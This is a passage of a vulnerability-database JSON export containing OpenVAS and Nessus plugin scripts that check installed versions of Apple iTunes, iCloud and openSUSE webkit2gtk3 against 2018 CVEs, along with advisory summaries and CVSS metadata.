exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"11.1.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"11.1.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-06T00:00:00", "id": "OPENVAS:1361412562310813513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813513", "type": "openvas", "title": "Apple iTunes Security Updates(HT208852)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT208852)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813513\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4188\", \"CVE-2018-4201\", \"CVE-2018-4218\",\n \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:01:42 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iTunes Security Updates(HT208852)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An authorization issue in state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - An inconsistent user interface issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208852\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nituneVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:ituneVer, test_version:\"12.7.5\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-06T00:00:00", "id": "OPENVAS:1361412562310813514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813514", "type": "openvas", "title": "Apple iCloud Security Updates(HT208853)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT208853)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813514\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4201\", \"CVE-2018-4218\", \"CVE-2018-4233\",\n \"CVE-2018-4188\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:24:10 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iCloud Security Updates(HT208853)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An authorization issue in state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - An inconsistent user interface issue in state management.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208853\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.5\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310852089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852089", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852089\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:43:57 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3473-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:3473-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-06-05T11:22:13", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "id": "OPENSUSE-2018-845.NASL", "href": "https://www.tenable.com/plugins/nessus/111626", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-845.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111626);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)\");\n script_summary(english:\"Check for the openSUSE-2018-845 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 